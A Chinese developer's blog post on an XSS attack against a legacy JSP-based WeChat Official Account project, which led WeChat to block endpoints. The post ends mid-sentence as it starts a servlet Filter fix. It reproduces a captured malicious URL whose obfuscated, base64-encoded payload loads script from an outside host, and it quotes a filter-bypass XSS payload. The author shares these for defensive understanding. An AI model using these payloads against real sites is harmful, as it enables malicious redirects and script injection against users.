目录
最近入职新公司后接手了一个项目,线上遇到一连串微信公众号的问题,都是项目之前留下的坑,之前没有接触过微信开发,踩完坑来记录一下。
XSS攻击
前景提要
公司项目属于比较旧的项目,没有前后端分离,还是用的SSM+JSP的架构,导致接口请求时被注入js脚本恶意跳转,然后被微信封了一批接口(例如https://www.aa.com/bb/cc接口被攻击,以bb为前缀的接口都会被封禁)
之前接触过的项目是前后端分离的,后台接口是REST风格,就算传入参数带有js脚本也造成不了影响(REST接口只向客户端返回数据),所以对XSS攻击没有太多了解,大概是接口做转发时把传入参数带到页面,然后页面对参数进行了一定的解析,遇到标签就执行了里面的代码,比如线上出现的这个恶意转发的问题,访问url被篡改成:
https://www.aa.com/bb/list.do?keyWord=1234abce';location.href%3Dja\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003a\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u005b\u0027\u0077\u0072\u0069\u0074\u0065\u0027\u005d\u0028\u0061\u0074\u006f\u0062\u0028\u0027\u0050\u0048\u004e\u006a\u0063\u006d\u006c\u0077\u0064\u0043\u0042\u007a\u0063\u006d\u004d\u0039\u004c\u0079\u0039\u0036\u004d\u0069\u0035\u006b\u0064\u0057\u0039\u0034\u0061\u0069\u0035\u006a\u0062\u0032\u0030\u0076\u0065\u0044\u0034\u0038\u004c\u0033\u004e\u006a\u0063\u006d\u006c\u0077\u0064\u0044\u0034\u00)3d%5Cu0027%5Cu0029%5Cu0029%5Cu003b%60//&U2FsdGVkX1zzdsgbfh2FHrdW3ZNZs1FOcFbGj59O9LB5LAOCgNzzdsgbfh2F4ptuBX9mEGb3vpzzdsgbfh2BSnd25kgUGphUaOJHIzzdsgbfh2BTPCkXKT0LbtZzzdsgbfh2Bfzzdsgbfh2Bqd3zi9OoMBzK5Xhxz4dBsaUb5JuWw76Vf1hfGimEQ5UkxSUJc99tewtIVsSwzzdsgbfh3Dzzdsgbfh3D&money=16217&from=groupmessage#1589503652828`
一看这个url,里面有location.href,很明显就是被转发了,但后面那一串是什么?我们来解析一下
做个转义加编码转换,得到了下面的:
https://www.aa.com/bb/list.do?keyWord=1234abce';location.href=javascript:document['write'](atob('PHNjcmlwdCBzcmM9Ly96Mi5kdW94ai5jb20veD48L3NjcmlwdD4)3d'));`//&U2FsdGVkX1zzdsgbfh2FHrdW3ZNZs1FOcFbGj59O9LB5LAOCgNzzdsgbfh2F4ptuBX9mEGb3vpzzdsgbfh2BSnd25kgUGphUaOJHIzzdsgbfh2BTPCkXKT0LbtZzzdsgbfh2Bfzzdsgbfh2Bqd3zi9OoMBzK5Xhxz4dBsaUb5JuWw76Vf1hfGimEQ5UkxSUJc99tewtIVsSwzzdsgbfh3Dzzdsgbfh3D&money=16217&from=groupmessage#1589503652828`
看到atob()函数,是BASE64的解密,对PHNjcmlwdCBzcmM9Ly96Mi5kdW94ai5jb20veD48L3NjcmlwdD4)3d
解密一下,得到:
<script src=//z2.duoxj.com/x></script>7t
这解析完是不是头大了,还有这种操作,之前看到知乎某个大佬总结XSS攻击的各种js脚本的写法,有一种更绝,预判你的预判,利用过滤后返回语句再次构成攻击语句来绕过,比如这种
http://192.168.1.102/xss/example3.php?name=<sCri<script>pt>alert("hey!")</scRi</script>pt>
,当你把<script>
过滤后留下的字符又组成了新的标签<sCript>
,真的是强
更多XSS攻击的姿势可见:https://zhuanlan.zhihu.com/p/26177815
问题解决
得,上面讲了一堆细节的,回到问题本身。线上用户访问被封禁的链接后会看到下面这个图
微信还贴心的提供了申请恢复访问
功能,这个申请一般是解决完系统漏洞后再去提交的,如果以前有解决经验可以先申请再修复,因为微信审核还是有点慢的(像我们领导联系了微信内部人员加紧审核,也用了4小时才审核通过)
然后我们来说下解决方法
像我们公司的项目页面用的jsp,可以在通用jsp页面中设置taglib,在标签类中做过滤的逻辑。
标签类一般继承TagSupport,然后重写doStartTag方法,在里面做过滤逻辑,标签类的定制化程度较高,这里就不贴代码了
另一种方法就是在servlet Filter中过滤,一般是重新包装chain.doFilter(ServletRequest var1, ServletResponse var2)中传入的HttpServletRequest,例子如下:
public class